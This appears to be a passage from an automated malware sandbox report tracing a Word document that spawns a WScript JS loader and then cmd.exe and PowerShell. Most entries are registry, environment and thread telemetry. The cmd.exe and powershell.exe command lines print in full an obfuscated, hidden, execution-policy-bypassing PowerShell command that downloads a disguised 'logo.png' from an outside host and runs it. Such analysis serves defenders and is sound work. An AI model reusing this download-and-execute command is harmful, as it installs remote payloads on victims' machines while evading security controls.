Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\aETAdzjz	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	3	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn

Thread 0x81c

34

0

»

Category	Operation	Information	Success	Count	Logfile

Process #19: wscript.exe

160

0

»

Information	Value
ID	#19
File Name	c:\windows\system32\wscript.exe
Command Line	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:16, Reason: Child Process
Unmonitor	End Time: 00:01:22, Reason: Self Terminated
Monitor Duration	00:00:05

OS Process Information

»

Information	Value
PID	0x8c0
Parent PID	0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 8C4 0x 828 0x 614 0x 358 0x 610 0x 878 0x A1C 0x 178 0x C4 0x BEC

Threads

Thread 0x8c4

159

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:46:19 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 147374	1	Fn
System	Get Time	type = Performance Ctr, time = 20159713919	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xff540000	2	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7705c4a0	1	Fn
Module	Get Filename	module_name = c:\windows\system32\wscript.exe, process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 80, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 80, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 80, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 80, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\.js	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\.js, data = JSFile, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine, data = JScript, type = REG_SZ	1	Fn
COM	Create	interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:20 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 148107	1	Fn
System	Get Time	type = Performance Ctr, time = 20233210442	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegisterTraceGuidsA, address_out = 0x7717f570	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExA, address_out = 0x7fefd72b5f0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features	1	Fn
Registry	Read Value	value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x7fefd730710	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoGetObjectContext, address_out = 0x7fefea4c920	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x7fefea57490	1	Fn
COM	Create	interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER	1	Fn
Environment	Get Environment String	name = JS_PROFILER	1	Fn
COM	Create	interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = Ticks, time = 148122	2	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
Module	Create Mapping	module_name = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304	1	Fn
Module	Map	C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Unmap	process_name = c:\windows\system32\wscript.exe	1	Fn
System	Get Info	type = System Directory, result_out = lõ	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\advapi32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x7fefd72e470	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferCloseLevel, address_out = 0x7fefd72f660	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:20 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 148653	1	Fn
System	Get Time	type = Performance Ctr, time = 20288422870	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, size = 19304, size_out = 19304	1	Fn Data
COM	Create	interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:20 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 148668	1	Fn
System	Get Time	type = Performance Ctr, time = 20289424671	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Info	type = Hardware Information	1	Fn
System	Get Time	type = Ticks, time = 149370	5	Fn
System	Get Time	type = Ticks, time = 149386	2	Fn
System	Get Time	type = Ticks, time = 149402	11	Fn
System	Get Time	type = Ticks, time = 149682	5	Fn
System	Get Time	type = Ticks, time = 149698	6	Fn
System	Get Time	type = Ticks, time = 149714	4	Fn
System	Get Time	type = Ticks, time = 149948	3	Fn
System	Get Time	type = Ticks, time = 149963	3	Fn
System	Get Time	type = Ticks, time = 149979	1	Fn
System	Get Time	type = Ticks, time = 150213	1	Fn
System	Get Time	type = Ticks, time = 150244	3	Fn
System	Get Time	type = Ticks, time = 150478	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn

Thread 0x614

1

0

»

Category	Operation	Information	Success	Count	Logfile
Window	Create	class_name = WSH-Timer, wndproc_parameter = 5200480		1	Fn

Process #20: cmd.exe

61

0

»

Information	Value
ID	#20
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:16, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:03:08

OS Process Information

»

Information	Value
PID	0x41c
Parent PID	0xbb0 (c:\windows\system32\wscript.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 8F0

Threads

Thread 0x8f0

61

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:46:21 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 149090	1	Fn
System	Get Time	type = Performance Ctr, time = 20331754719	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4ac50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77056d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Documents	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x770523d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77048290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x770517e0	1	Fn
Environment	Get Environment String	name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp	2	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	2	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0x568, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data

Process #21: powershell.exe

354

0

»

Information	Value
ID	#21
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:19, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:03:06

OS Process Information

»

Information	Value
PID	0x568
Parent PID	0x41c (c:\windows\system32\wscript.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 5FC 0x 3B4 0x BD8 0x BD0 0x BD4 0x BE8 0x 7A4 0x 7B0

Memory Dumps

»

